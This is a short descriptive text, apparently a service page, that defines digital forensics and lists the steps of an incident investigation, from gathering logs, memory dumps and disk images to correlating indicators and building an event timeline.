Digital Forensics is the activity of collecting, storing, and analyzing data from computer systems and applications that have been the target of unregulated and malicious actions against them.
The purpose of Digital Forensics is to gather and summarize information relevant to a cybersecurity incident that has occurred within an organization.
The attack vector to a given system, device or application can be determined depending on the available data for analysis and its volume.
Gathering initial information for analysis:
• Log data from affected devices, security and monitoring systems.
• Conduct analysis of log files.
• RAM memory dump of the affected systems (Windows, Linux) that were not shut down after an incident.
• Information about the current network connections of the affected systems (Windows, Linux).
• Forensic image of hard disk.
• Review of the collected data.
• Search for information relevant to the incident in order to determine the vector of the attack and the reasons that led to it.
• Correlation of the found IoC and artifacts from the different data sources and determining the attack vector.
• If necessary, recovery of the important artifacts (files) from the disk copies that may be related to the incident.
• A detailed description of the Digital Forensic process for the specific incident.
• A full description of all information found in the analysis of the initially acquired data.
• Depending on the available data for analysis, creation of a timeline with events.